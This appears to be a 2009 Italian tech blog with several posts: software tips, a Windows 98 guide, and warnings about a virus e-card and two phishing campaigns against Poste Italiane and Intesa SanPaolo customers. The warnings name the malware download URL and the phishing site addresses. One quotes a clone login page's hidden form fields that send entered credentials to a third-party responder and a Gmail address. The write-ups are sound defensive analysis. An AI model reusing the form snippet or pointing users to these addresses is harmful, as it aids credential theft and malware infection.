28 giugno 2009

Motime: Un pasticcio chiamato Splinder

Ho sempre avuto una ottima opinione di Splinder a cui storicamente va riconosciuta serietà e attenzione alle esigenze dei suoi iscritti. Con il passaggio di Tipic sotto il controllo di Dada non ci sono stati fortunatamente grandi cambiamenti, eppure l'impressione è che qualcosa sia mutato decisamente in peggio. E non mi riferisco ai continui rimandi che portano agli altri servizi offerti dal gruppo ne alla forzata integrazione che sembra prospettarsi con Blogo.it quanto al rapporto tra la piattaforma ed i suoi utenti.

La questione si è secondo me manifestata in modo evidente con Motime che, per chi non lo sapesse, è la versione dedicata al mercato americano di Splinder online dal 1993. Lo scorso 10 giugno sul blog ufficiale è stato annunciato un cambiamento solo all'apparenza secondario. Tutti i blog su domini del tipo nomeblog.motime.com saranno trasferiti all'URL nomeblog.us.splinder.com. A parte la questione estetica, il disaggio è evidente, si perdono link in ingresso, riferimenti e citazioni su altri blog, ed in un certo senso anche la propria identità digitale.

A sorprendermi è però è l'assenza di informazioni nella gestione di un simile passaggio. Sembra di capire che la decisione sia finalizzata a unificare le diverse piattaforme di blog gestitete da Dada in un ottica di internazionalizzazione del servizio. Motime ha sempre avuto un numero di iscritti di un ordine di grandezza inferiore rispetto a Splider, ma parliamo comunque di diverse migliaia di utenti che si sono ritrovati abbandonati a se stessi e costretti, per orientarsi, a far riferimento a pagine scritte completamente in Italiano (è adirittura nato un social network per i transfughi di motime...)

Mi resta incomprensibile la scelta di abbandonare il dominio motime.com, tanto più che integrando i due servizi si sarebbe potuto consentire agli utenti di scegliersi l'URL. Il nuovo us.splinder.com anticipa anche alcune novità che a breve potrebbero arrivare anche sulla versione italiana. La prima è il passaggio della piattaforma sotto la gestione Blogo.it come già appare sul sito americano. La seconda è la possbilità di effetuare il login anche con un account Facebook.

22 giugno 2009

[Virus] Mary sent you a post card

Un appunto veloce su una mail appena arrivata in posta elettronica:
mittente: "Post Card"
oggetto: Mary sent you a post card
contenuto:
*Mary sent you a post card*

*If you want to see it CLICK HERE*

Best Regards, Post Card Inc.
info@postcard[dot]com
Da annotare subito che l'indirizzo del mittente non coincide con quello dichiarato in calce, in particolare si è sostituita la 't' con la 'l'. Il testo CLICK HERE è un collegamento che punta direttamente al file uavmedia.com/greet.exe
Si tratta quindi di un eseguibile che con ogni probabilità è un virus. L'indirizzo di destinazione non è al momento raggiungibile quindi non ho modo di eseguire qualche verifica.

CurrPorts: Monitorare le porte TCP/UDP del sistema

CurrPorts è uno strumento che consente di monitorare l'attività che si svolge per ciascuna porta del sistema operativo sui protocolli TCP o UDP. L'applicazione non richiede installazione ed è estremamente leggera (meno di 100 Kb su disco). Rispetto ad un classico netstat -an, CurrPorts fornisce un impressionante numero di informazioni aggiuntive, tra le quali la risoluzione dell'host di destinazione e i dettagli sull'applicazione che genera il traffico.
Attraverso i menù del programma, CurrPorts consente di bloccare i dati in transito su una specifica porta o anche di arrestare il programma/processo corrisponedente. Molto interessanti sono anche le funzioni che permettono di filtrare i risultati ed esportare sotto forma di report l'analisi del programma. CurrPorts inoltre segnala quei processi che generano traffico sospetto.

Il programma è scaricabile gratuitamente dal sito Nirsoft, dove è disponibile anche la traduzione italiana di Marco D'Amato.

19 giugno 2009

Miranda IM 0.8: messenger universale

Mi è capitato un paio di altre volte di parlare in questo blog di Miranda IM, un programma open source per la messaggistica istantanea che supporta simultaneamente molti protocolli tra cui Aim, Icq, Yahoo!, Msn, Jabber/GTalk ed Irc.
Ci ritorno oggi perchè da poche ore è disponibile la versione 0.8 che segna un passo importante nell'evoluzione del programma. Tra le molte novità introdotte segnalo l'introduzione di un account manager che facilità la creazione degli account e cosente di gestirne anche più di uno sullo stesso protocollo (in precedenza questo era possibile solo duplicando manualemnte una dll del programma) e l'utile supporto per i messaggi off-line su Msn.
Da segnalare anche che dal 15 giugno il progetto è stato trasferito da Sourceforge a Google Code.

17 giugno 2009

Unicode, installare un font universale

Non so quanti di voi visitino quotidianamente la home page di Yahoo! Japan. A me è capitato oggi ed è stata una sfilza infinita di rettangolini vuoti (con Opera) e punti interrogativi (con Firefox). Questo accade perché la maggior parte dei font (tipi di carattere) installati in Windows suporta solo la codifica ASCII estesa o una versione parziale di Unicode. Può succedere quindi che tra centinaia di font disponibili nessuno supporti gli alfabeti orientali.

Il problema si risolve banalmente installando il font necessario. Una lista completa di questi font è disponibile sul sito di Alan Wood che contiene anche molte altre risorse su Unicode.

Per risolvere la questione una volta per tutte si può installare un font Unicode universale, che contenga cioè la codifica della maggior parte delle lingue del pianeta. Uno di questi è Bitstream Cyberbit del quale è possibile scaricare una versione non recentissima ma abbastanza completa attraverso il vecchio sito ftp di Netscape.

Scaricato l'archivio zip è necessario estarre l'unico file contenuto (Cyberbit.ttf). Per l'installazione occorre anzitutto accedere con i diritti di amministrazione, quindi richiamare la cartella Fonts dal pannello di controllo o tramite la sequenza: Start > Esegui > Fonts (Invio). L'installazione consiste semplicemnte nel trascinare Cyberbit.ttf nella cartella Fonts di Windows.

Il caratere Bitstream Cyberbit verrà usato dal browser ogni qualvolta caricherà un sito con codifica Unicode non inclusa nei font usati di default. Inoltre lo stesso font sarà utilizzabile in qualsiasi altro programma installato.

16 giugno 2009

[phishing] Posteitaliane.it - Attenzione Richiesta

Non so se sia completamente inedito oppure meno, ma dalle verifiche che ho fatto sembrerebbe che questo caso di phishing a danno degli utenti di Poste Italiane sia relativamente recente e non documentato. Ho deciso quindi di scrivere due righe fermo restando che la tecnica usata non presenta particolari spunti di originalità.

mittente apparente:"Posteitaliane"
oggetto: Posteitaliane.it - Attenzione Richiesta

messaggio:
Posteitaliane
Utente nr. 0483912291(it)
Email inviata il giorno 16 Giugno alle 7.26.00 (cest) da -Amministrazione e Sicurezza Posteitaliane.it-

Comunicazione Urgente - Leggere con attenzione

Gentile Cliente,

Recenti accrediti a Suo favore sono stati classificati ad elevato livello di rischio in quanto, in seguito a verifiche di natura tecnica,i dati anagrafici da Lei forniti in fase di sottoscrizione, risultano incompleti o inesatti.
Le operazioni da Lei effettuate fino ad oggi sono state classificate come -operazioni ad alto rischio- per la suddetta motivazione.Nell'impossibilità di Posteitaliane di verificare la veridicità dei Suoi dati la preghiamo di procedere come di seguito descritto.
1) Eseguire la procedura di verifica del proprio indirizzo email mediante il link riportato di seguito e completare le informazioni richieste per confermare la propria identità.
2) Successivamente, entro e non oltre 14 giorni da
lla verifica OnLine del proprio indirizzo email, recarsi in un qualsiasi ufficio postale (con documento di riconoscimento) per ritirare e firmare la nuova documentazione e contratto per gli utenti finali relativa al suo conto Bancoposta o Postepay (a seconda delle sottoscrizioni effettuate)
Importante: prima di ritirare e firmare la documentazione relativa alla tipologia di servizio da Lei sottoscritto (Bancoposta e/o Postepay) è necessaria la verifica dell'indirizzo email cliccando sul link sottostante.

Esegui verifica account


Il messaggio presenta sia una versione testuale che una in HTML, questa ripropone loghi e stili propri di Poste Italiane. Il link per eseguire la verifica ovviamente non conduce al sito delle Poste ma all'indirizzo:
entropy17.agava.net/~vitalin7
Qui un redirect porta alla pagina:
89.108.68.86/ ~vitalin7/mail-redirecting/secure.poste.it/bancopos-l/secure-login/login.htm
dove si trova il solito sito clone che vi mostro nell'immagine seguente:

Come annotazioni ulteriori aggiungo che la mail è correttamente identificata come spam da Yahoo! Mail mentre l'accesso alla pagine-trappola è bloccato da Opera ma non fa scattare alcuna misura protettiva in Firefox.

Per chi avesse erroneamente inserito i propri dati nel form, il consiglio è quello di chiedere l'immediato blocco del proprio conto. Dettagli ulteriori sono disponibili sulle pagine dedicate alla lotta al phishing del sito Poste Italiane.

12 giugno 2009

Usare Windows 98 ai tempi di Vista

Premetto subito che un post come questo avrebbe avuto senso 3/4 anni fa, mentre oggi è solo una nostalgica guida per smanettoni. Precisato questo va detto che avendo un hardware supportato utilizzare ancora oggi Windows 98 è tutt'altro che impossibile, basta non aspettarsi miracoli e convivere con una progressiva carenza di programmi. Senza contare poi che una macchina virtuale Windows 98 può essere di grande utilità per continuare ad usare programmi non più compatibili con Windows 2000/Xp/Vista. Se la cosa vi interessa ecco un breve guida per tenere Windows 98 al passo con le necessità attuali.

Passo 1: Installare il sistema operativo
La procedura da seguire dipende dalla versione di cui si dispone. Per Win98 è necessario disporre di un dischetto di boot, mentre per Win98Se è lo stesso cd ad essere auto- installante. Nel primo caso Windows 98 disporrà nativamente di Internet Explorer 4, nel secondo caso si avrà a disposizione IE5.

Passo 2: Installare Internet Explorer 6
Il primo componente da aggiornare è Internet Explorer. L'ultima versione compatibile con Win98 è la 6 disponibile per il download sul sito Microsoft.

Passo3: Installare Unofficial Windows 98 Service Pack
Unofficial Windows 98 Service Pack è un progetto portato avanti da sviluppatori provati che riunisce in un solo pacchetto gli aggiornamenti più importati rilasciati da Microsoft per Windows 98. Oltre a molte patch il pachetto contiene anche alcune chicche come TweakUi, nonché un aggiornamento grafico che rende l'ambiente più simile a Windows 2000. Il pachetto si può scaricare in inglese da Exuberant Software o da Softpedia. Esiste anche una versione italiana che si può scaricare da eng2ita o su andreatv.it.

A Questo punto Windows 98 è maggiormente corazzato ma difficilmente è utilizzabile in rete. Anche se i virus per Win9x sono abbastanza rari ormai, il sistema è in ogni caso privo di difese efficaci e quindi facilmente infettabile. Procediamo quindi cercano di mettere assieme un buon pacchetto di sicurezza gratuito. Aggiungiamo inoltre i programmi minimi per poter utilizzare il sistema.

Passo 4: L'Antivirus
La ricerca di un buon antivirus per Windows 98 è meno probelmatica di quanto si possa credere. Avast, antivirus che utilizzo con piena soddisfazione da diverso tempo, è infatti compatibile con tutte le versioni di Windows dalla 95 in poi! Come alternativa c'è sempre ClamAv.

Passo 5: Firewall
Più complesso è il discorso Firewall. Nessuna delle maggiori soluzioni attuali è compatibile con Win98, si può però ricorrere all'ultima versione di Sygate Personal Firewall che si può scaricare gratuitamente da Softpedia.

Passo 6: Browser/Mail
L'aggiornamento ad Internet Explorer 6 che suggerisco sopra va inteso limitatamente alle funzionalità condivise con il sistema operativo. Per la navigazione sicura sul web l'unico browser oggi pienamente compatibile con Windows 98 è Opera 9 (che funziona anche su Windows 95!). Questo programma integra anche un client mail, un lettore di newsgroups, una char IRC , un download manager ed un gestore di feed RSS/Atom. In sostanza è una soluzione completa per l'accesso alle risorse internet. Senza contare che una volta provato Opera difficilmente si torna indietro...

Passo 7: Il software necessario
Un esempio minimo di software a corredo del sistema operativo potrebbe essere il seguente:
- OpenOffice.org 2.4 come suite per videoscrittura, fogli di calcolo, presentazioni, disegno vettoriale e database (le versioni 3.x non sono compatibili)
- PhotoFiltre per la gestione ed il ritocco delle immagini.
- VLC media player per la gestione di tutti i contenuti multimediali audio/video
- 7 Zip per la gestione di tutti gli archivi compressi (zip, rar, tar, cab etc).
Per tutto il resto si può sempre fare riferimento al sito Oldversion per recupeare le vecchie versioni dei programmi più diffusi.

Passo 8: Ulteriori risorse
- Risorse su microsoft.com per Windows 98
- Driver (uno e due) universali per supporti USB
- Windows 98 Revolutions Pack 7 (porta lo stile Xp su Windows 98)
- MSN Messenger 7.0 per Windows 98 (utilizzo sconsigliato, sostitubile com Miranda Im)
- Windows Media Player 9 (ultima versione compatibile)
- Adobe Acrobat 5.0.5 per la lettura dei file PDF

05 giugno 2009

[phishing] Moneta, password carta Flash

E' in corso un massiccio attacco phishing a danno dei servizi Moneta del gruppo Intesa SanPaolo. L'azione è veicolata tramite mail il cui contenuto è questo:
mittente: "Moneta Online"
oggetto: La password de la sua carta Flash

testo:
La password de la sua carta Flash e stata inserita piu di tre volte.
Per proteggere la sua carta abbiamo sospenso il acceso.
Per recuperare il acceso prego di entrare
[link al sito trappola]
e completare la pagina di attivazione.

Grazie ancora per aver scelto i servizi on-line di carta FLASH.
I migliori saluti.


Servizio Clienti IntesaSanPaolo
A prescindere dal fatto che il mittente di una email non è mai certo, si può notare come il dominio apparente non appartiene al registro italiano (.it) ma a quello lituano (.lt). Nel testo sono poi contenti una serie di errori grammaticali piuttosto grossolani che tradiscono immediatamente la natura truffaldina del messaggio.

Il link che ho rimosso conduce ad una pagine interna del sito rocstacommunity.com considerato a rischio da Netcraft. Qui viene riprodotta fedelmente la pagine di login del sito Intesa SanPaolo come evidente in questa immagine:
La mancata corrispondenza dell'indirizzo e il fatto che la connessione non sia sicura (https) dovrebbero essere ragioni sufficienti ad evitare qualsiasi altra operazione. Analizzando il codice della pagina si trova questo interessante blocco:
< method="post" action="http://www.iolfree.ie/cgi-bin/responder">
< type="hidden" name="_recipient" value="janinedouglas0@gmail.com">
Tradotto significa che i dati inseriti verranno gentilmente recapitati all'indirizzo janinedouglas0@gmail.com a disposizione degli autori della truffa. Per chi avesse commesso l'errore di inserire i propri dati nel form il consiglio banale è quello di bloccare immediatamente la carta chiamando il numero indicato qui.